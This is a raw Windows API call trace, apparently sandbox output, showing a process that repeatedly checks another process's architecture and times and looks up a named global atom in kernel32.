	[0124.703] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.703] CloseHandle (hObject=0x69c) returned 1
	[0124.703] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.704] CloseHandle (hObject=0x69c) returned 1
	[0124.704] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.704] CloseHandle (hObject=0x69c) returned 1
	[0124.704] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.704] CloseHandle (hObject=0x69c) returned 1
	[0124.704] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.704] CloseHandle (hObject=0x69c) returned 1
	[0124.704] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.704] CloseHandle (hObject=0x69c) returned 1
	[0124.705] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.705] CloseHandle (hObject=0x69c) returned 1
	[0124.705] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.705] CloseHandle (hObject=0x69c) returned 1
	[0124.705] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.705] CloseHandle (hObject=0x69c) returned 1
	[0124.705] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.705] CloseHandle (hObject=0x69c) returned 1
	[0124.705] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.705] CloseHandle (hObject=0x69c) returned 1
	[0124.706] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.706] CloseHandle (hObject=0x69c) returned 1
	[0124.706] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.706] CloseHandle (hObject=0x69c) returned 1
	[0124.706] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.706] CloseHandle (hObject=0x69c) returned 1
	[0124.707] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.707] CloseHandle (hObject=0x69c) returned 1
	[0124.707] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.707] CloseHandle (hObject=0x69c) returned 1
	[0124.707] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.707] CloseHandle (hObject=0x69c) returned 1
	[0124.707] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.707] CloseHandle (hObject=0x69c) returned 1
	[0124.707] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.708] CloseHandle (hObject=0x69c) returned 1
	[0124.708] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.708] CloseHandle (hObject=0x69c) returned 1
	[0124.708] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.708] CloseHandle (hObject=0x69c) returned 1
	[0124.708] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.708] CloseHandle (hObject=0x69c) returned 1
	[0124.708] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.708] CloseHandle (hObject=0x69c) returned 1
	[0124.709] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.709] CloseHandle (hObject=0x69c) returned 1
	[0124.709] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.709] CloseHandle (hObject=0x69c) returned 1
	[0124.709] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.709] CloseHandle (hObject=0x69c) returned 1
	[0124.709] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.709] CloseHandle (hObject=0x69c) returned 1
	[0124.709] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.710] CloseHandle (hObject=0x69c) returned 1
	[0124.710] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.710] CloseHandle (hObject=0x69c) returned 1
	[0124.710] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.710] CloseHandle (hObject=0x69c) returned 1
	[0124.710] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0124.710] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0124.711] GetProcessTimes (in: hProcess=0x69c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0124.711] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0124.711] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0124.711] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0124.711] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0124.712] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0124.712] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0124.712] CloseHandle (hObject=0x69c) returned 1
	[0124.712] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0124.712] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.712] CloseHandle (hObject=0x69c) returned 1
	[0124.712] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.712] CloseHandle (hObject=0x69c) returned 1
	[0124.712] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.712] CloseHandle (hObject=0x69c) returned 1
	[0124.713] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.713] CloseHandle (hObject=0x69c) returned 1
	[0124.713] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.713] CloseHandle (hObject=0x69c) returned 1
	[0124.755] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.755] CloseHandle (hObject=0x69c) returned 1
	[0124.755] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.755] CloseHandle (hObject=0x69c) returned 1
	[0124.756] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.756] CloseHandle (hObject=0x69c) returned 1
	[0124.756] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.756] CloseHandle (hObject=0x69c) returned 1
	[0124.756] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.756] CloseHandle (hObject=0x69c) returned 1
	[0124.756] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.756] CloseHandle (hObject=0x69c) returned 1
	[0124.756] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.756] CloseHandle (hObject=0x69c) returned 1
	[0124.757] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.757] CloseHandle (hObject=0x69c) returned 1
	[0124.757] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.757] CloseHandle (hObject=0x69c) returned 1
	[0124.757] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.757] CloseHandle (hObject=0x69c) returned 1
	[0124.757] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.757] CloseHandle (hObject=0x69c) returned 1
	[0124.758] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.758] CloseHandle (hObject=0x69c) returned 1
	[0124.758] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.758] CloseHandle (hObject=0x69c) returned 1
	[0124.758] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.758] CloseHandle (hObject=0x69c) returned 1
	[0124.759] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.759] CloseHandle (hObject=0x69c) returned 1
	[0124.759] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.759] CloseHandle (hObject=0x69c) returned 1
	[0124.759] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.759] CloseHandle (hObject=0x69c) returned 1
	[0124.759] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.759] CloseHandle (hObject=0x69c) returned 1
	[0124.759] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.760] CloseHandle (hObject=0x69c) returned 1
	[0124.760] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.760] CloseHandle (hObject=0x69c) returned 1
	[0124.760] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.760] CloseHandle (hObject=0x69c) returned 1
	[0124.760] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.760] CloseHandle (hObject=0x69c) returned 1
	[0124.760] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.760] CloseHandle (hObject=0x69c) returned 1
	[0124.761] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.761] CloseHandle (hObject=0x69c) returned 1
	[0124.761] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.761] CloseHandle (hObject=0x69c) returned 1
	[0124.761] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.761] CloseHandle (hObject=0x69c) returned 1
	[0124.761] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.761] CloseHandle (hObject=0x69c) returned 1
	[0124.762] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.762] CloseHandle (hObject=0x69c) returned 1
	[0124.762] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.762] CloseHandle (hObject=0x69c) returned 1
	[0124.762] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.762] CloseHandle (hObject=0x69c) returned 1
	[0124.762] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0124.763] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0124.763] GetProcessTimes (in: hProcess=0x69c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0124.763] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0124.763] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0124.763] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0124.764] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0124.764] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0124.764] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0124.764] CloseHandle (hObject=0x69c) returned 1
	[0124.764] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0124.764] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.764] CloseHandle (hObject=0x69c) returned 1
	[0124.764] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.764] CloseHandle (hObject=0x69c) returned 1
	[0124.765] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.765] CloseHandle (hObject=0x69c) returned 1
	[0124.765] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.765] CloseHandle (hObject=0x69c) returned 1
	[0124.765] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.765] CloseHandle (hObject=0x69c) returned 1
	[0124.799] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.799] CloseHandle (hObject=0x69c) returned 1
	[0124.799] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.799] CloseHandle (hObject=0x69c) returned 1
	[0124.799] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.799] CloseHandle (hObject=0x69c) returned 1
	[0124.800] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.800] CloseHandle (hObject=0x69c) returned 1
	[0124.800] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.800] CloseHandle (hObject=0x69c) returned 1
	[0124.800] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.800] CloseHandle (hObject=0x69c) returned 1
	[0124.800] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.800] CloseHandle (hObject=0x69c) returned 1
	[0124.800] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.800] CloseHandle (hObject=0x69c) returned 1
	[0124.801] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.801] CloseHandle (hObject=0x69c) returned 1
	[0124.801] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.801] CloseHandle (hObject=0x69c) returned 1
	[0124.801] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.801] CloseHandle (hObject=0x69c) returned 1
	[0124.801] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.801] CloseHandle (hObject=0x69c) returned 1
	[0124.802] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.802] CloseHandle (hObject=0x69c) returned 1
	[0124.802] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.802] CloseHandle (hObject=0x69c) returned 1
	[0124.802] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.802] CloseHandle (hObject=0x69c) returned 1
	[0124.802] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.802] CloseHandle (hObject=0x69c) returned 1
	[0124.802] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.802] CloseHandle (hObject=0x69c) returned 1
	[0124.803] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.803] CloseHandle (hObject=0x69c) returned 1
	[0124.803] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.803] CloseHandle (hObject=0x69c) returned 1
	[0124.803] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.803] CloseHandle (hObject=0x69c) returned 1
	[0124.803] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.803] CloseHandle (hObject=0x69c) returned 1
	[0124.804] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.804] CloseHandle (hObject=0x69c) returned 1
	[0124.804] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.804] CloseHandle (hObject=0x69c) returned 1
	[0124.804] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.804] CloseHandle (hObject=0x69c) returned 1
	[0124.804] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.804] CloseHandle (hObject=0x69c) returned 1
	[0124.804] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.804] CloseHandle (hObject=0x69c) returned 1
	[0124.805] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.805] CloseHandle (hObject=0x69c) returned 1
	[0124.805] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.805] CloseHandle (hObject=0x69c) returned 1
	[0124.813] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.813] CloseHandle (hObject=0x69c) returned 1
	[0124.813] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.813] CloseHandle (hObject=0x69c) returned 1
	[0124.814] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0124.814] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0124.814] GetProcessTimes (in: hProcess=0x69c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0124.815] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0124.815] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0124.816] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0124.816] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0124.816] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0124.816] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0124.816] CloseHandle (hObject=0x69c) returned 1
	[0124.816] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0124.816] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.816] CloseHandle (hObject=0x69c) returned 1
	[0124.816] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.817] CloseHandle (hObject=0x69c) returned 1
	[0124.817] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.817] CloseHandle (hObject=0x69c) returned 1
	[0124.817] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.817] CloseHandle (hObject=0x69c) returned 1
	[0124.817] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.817] CloseHandle (hObject=0x69c) returned 1
	[0124.853] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.853] CloseHandle (hObject=0x69c) returned 1
	[0124.853] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.853] CloseHandle (hObject=0x69c) returned 1
	[0124.854] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.854] CloseHandle (hObject=0x69c) returned 1
	[0124.854] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.854] CloseHandle (hObject=0x69c) returned 1
	[0124.854] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.854] CloseHandle (hObject=0x69c) returned 1
	[0124.854] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.854] CloseHandle (hObject=0x69c) returned 1
	[0124.855] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.855] CloseHandle (hObject=0x69c) returned 1
	[0124.855] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.855] CloseHandle (hObject=0x69c) returned 1
	[0124.855] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.855] CloseHandle (hObject=0x69c) returned 1
	[0124.855] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.855] CloseHandle (hObject=0x69c) returned 1
	[0124.856] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.856] CloseHandle (hObject=0x69c) returned 1
	[0124.856] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.856] CloseHandle (hObject=0x69c) returned 1
	[0124.856] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.856] CloseHandle (hObject=0x69c) returned 1
	[0124.856] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.856] CloseHandle (hObject=0x69c) returned 1
	[0124.857] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.857] CloseHandle (hObject=0x69c) returned 1
	[0124.857] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.857] CloseHandle (hObject=0x69c) returned 1
	[0124.857] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.857] CloseHandle (hObject=0x69c) returned 1
	[0124.857] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.857] CloseHandle (hObject=0x69c) returned 1
	[0124.858] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.858] CloseHandle (hObject=0x69c) returned 1
	[0124.858] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.858] CloseHandle (hObject=0x69c) returned 1
	[0124.858] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.858] CloseHandle (hObject=0x69c) returned 1
	[0124.858] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.859] CloseHandle (hObject=0x69c) returned 1
	[0124.859] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.859] CloseHandle (hObject=0x69c) returned 1
	[0124.859] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.859] CloseHandle (hObject=0x69c) returned 1
	[0124.859] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.859] CloseHandle (hObject=0x69c) returned 1
	[0124.860] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.860] CloseHandle (hObject=0x69c) returned 1
	[0124.860] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.860] CloseHandle (hObject=0x69c) returned 1
	[0124.860] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.860] CloseHandle (hObject=0x69c) returned 1
	[0124.860] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.860] CloseHandle (hObject=0x69c) returned 1
	[0124.861] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.861] CloseHandle (hObject=0x69c) returned 1
	[0124.861] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0124.861] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0124.861] GetProcessTimes (in: hProcess=0x69c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0124.861] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0124.862] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0124.862] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0124.862] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0124.862] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0124.862] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0124.862] CloseHandle (hObject=0x69c) returned 1
	[0124.862] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0124.863] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.863] CloseHandle (hObject=0x69c) returned 1
	[0124.863] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.863] CloseHandle (hObject=0x69c) returned 1
	[0124.863] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0124.863] CloseHandle (hObject=0x69c) returned 1
